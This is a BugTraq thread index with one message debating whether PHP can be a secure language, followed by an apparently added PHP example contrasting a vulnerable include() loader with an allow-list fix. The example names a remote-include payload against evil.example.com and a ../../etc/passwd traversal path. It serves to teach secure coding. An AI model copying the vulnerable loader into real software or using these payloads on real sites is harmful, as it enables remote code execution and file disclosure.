BugTraq
new linux malware Feb 18 2006 10:40PM
Gadi Evron (ge linuxbox org) (2 replies)
Re: new linux malware Feb 20 2006 04:57PM
Christine Kronberg (Christine_Kronberg genua de) (1 replies)
PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 20 2006 08:22PM
Gadi Evron (ge linuxbox org) (2 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Dec 30 2006 10:00PM
Kevin Waterson (kevin oceania net) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 05:53PM
Bill Nash (billn billn net) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 09:00PM
Tino Wildenhain (tino wildenhain de) (1 replies)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 09:31PM
Jim Harrison (Jim isatools org) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 10:37PM
Dana Hudes (dhudes hudes org) (1 replies)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 12:02AM
Jim Harrison (Jim isatools org) (2 replies)
Re: PHP as a secure language? PHP worms? Jan 02 2007 12:01PM
Duncan Simpson (dps simpson demon co uk) (1 replies)
RE: PHP as a secure language? PHP worms? Jan 02 2007 02:17PM
Jim Harrison (Jim isatools org)
Actually, that's my point.
By definition, such a language would prevent any insecure coding.
Simply making it difficult only increases the "security index" (new
rating system?); it does not make the language "secure".

-----Original Message-----
From: Duncan Simpson [mailto:dps (at) simpson.demon.co (dot) uk [email concealed]]
Sent: Tuesday, January 02, 2007 4:02 AM
To: Jim Harrison
Cc: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Re: PHP as a secure language? PHP worms?

Nobody has seen fit to point this out but there *are* secure languages.
In general these languages have limited feature sets or, at least in the
case of java, explicit sandbox features intended to stop bad things
happening. Groups of monks competing for an abacus are probably unable
to read your password file, for example.

Some languages make particular sorts of vulnerability easy to implement
and arguably this is a bad thing. Nobody would be hit if they did
proper input validation but that requires real effort and is tedious to
implement.

PHP's URL as filename and register_globals features make several sorts
of abuse trivial. I know the latter is off by default but lots of
vulnerable scripts require you to enable this feature.

C makes bofs and integer overflows easy to implement but fopen(3) lacks
magic features, so putting http://evil.example.com/evilcode? in front of
a filename gets the crackers nowhere. Arguably writing CGI applications
is harder too, so those that do have more clues.

perl is nice but you have to watch out for strings containing nulls and
the magic features of perl's open function.

etc ad infinitum.

I am currently using C for my CGI programs but that is because several
large operations that get used a lot are a few thousand lines of C for
speed. My choice of CGI library also offers ZIP archive expansion and
there are multiple instances where this is useful (the filenames in the
ZIP archive are ignored).

AFAIK there are no bof, integer overflow or SQL injection features yet
:-)
--
Duncan (-:
"software industry, the: unique industry where selling substandard goods
is legal and you can charge extra for fixing the problems."


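The two PHP features Duncan calls out above (a URL accepted as a filename by include(), and register_globals turning request parameters into variables) shown as an added example of the vulnerable pattern next to a hardened version. This is not code from the thread or from any project mentioned in it; the template names, the templates directory and the load_page_* function names are invented for illustration, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example, not from the thread. A "page loader" that takes a template
// name from the request, first in the shape Duncan describes, then hardened.

// --- Vulnerable pattern ---
// With register_globals=On, a request ?page=http://evil.example.com/evilcode?
// sets $page before the script runs. If allow_url_fopen is on (and, from
// PHP 5.2 onward, allow_url_include as well), include() fetches and executes
// that remote file; the trailing '?' turns the appended '.php' into a query
// string. The same bug exists without register_globals when the script does
// include($_GET['page'] . '.php'): a path such as ../../etc/passwd (with a
// NUL byte to cut off the suffix on older PHP) walks the local filesystem.
function load_page_vulnerable(string $page): void
{
    include $page . '.php';   // attacker-controlled URL or path lands here
}

// --- Hardened version ---
// Never build a path or URL from user input. Map the request parameter
// through an allow-list of known templates and resolve the result against a
// fixed directory so nothing outside it can be reached. Server-side, keep
// register_globals = Off and allow_url_include = Off in php.ini regardless.
const TEMPLATE_DIR = __DIR__ . '/templates';   // assumed layout
const TEMPLATES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_template(string $page): ?string
{
    if (!isset(TEMPLATES[$page])) {
        return null;                           // unknown name: refuse, never guess
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . TEMPLATES[$page]);
    // realpath() returns false for a missing file and collapses symlinks and
    // '..' segments; the prefix check catches an allow-list entry that was
    // edited to point outside the template directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function load_page_hardened(string $page): void
{
    $path = resolve_template($page);
    if ($path === null) {
        http_response_code(404);
        echo 'no such page';
        return;
    }
    include $path;                             // only ever a vetted local file
}

// Read the parameter from the superglobal explicitly; never depend on
// register_globals having populated $page.
load_page_hardened($_GET['page'] ?? 'home');
```

The point of the allow-list is that the request parameter is used as a lookup key and never as part of a path string, so neither the URL wrapper nor directory traversal has anything to act on; the realpath() prefix check is belt-and-braces against a mistake in the table itself.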
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 10:58AM
Darren Reed (avalon caligula anu edu au) (2 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 03:16PM
Dana Hudes (dhudes hudes org) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 06:48PM
Lawrence Paul MacIntyre (macintyrelp ornl gov)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 02:15PM
Jim Harrison (Jim isatools org) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 06:37PM
Darren Reed (avalon caligula anu edu au) (3 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 03 2007 05:16AM
Ronald Chmara (ron Opus1 COM) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 04 2007 08:59PM
Jim Manico (jim manico net)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 09:07PM
Bill Nash (billn billn net)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 07:18PM
Jim Harrison (Jim isatools org)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 22 2006 10:48AM
Kevin Waterson (kevin oceania net) (2 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 24 2006 09:13PM
Matthew Schiros (schiros gmail com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 03:26PM
L. Adrian Griffis (agriffis dstsystems com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 03:50PM
Matthew Schiros (schiros gmail com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 04:21PM
L. Adrian Griffis (agriffis dstsystems com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 05:55PM
Matthew Schiros (schiros gmail com)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 24 2006 09:07PM
Jamie Riden (jamie riden gmail com)
Re: new linux malware Feb 20 2006 04:24PM
Marco Monicelli (marco monicelli marcegaglia com) (1 replies)
Re: new linux malware Feb 20 2006 07:58PM
Gadi Evron (ge linuxbox org) (1 replies)
Re: new linux malware Feb 22 2006 08:00PM
Jamie Riden (jamie riden gmail com)
Copyright 2010, SecurityFocus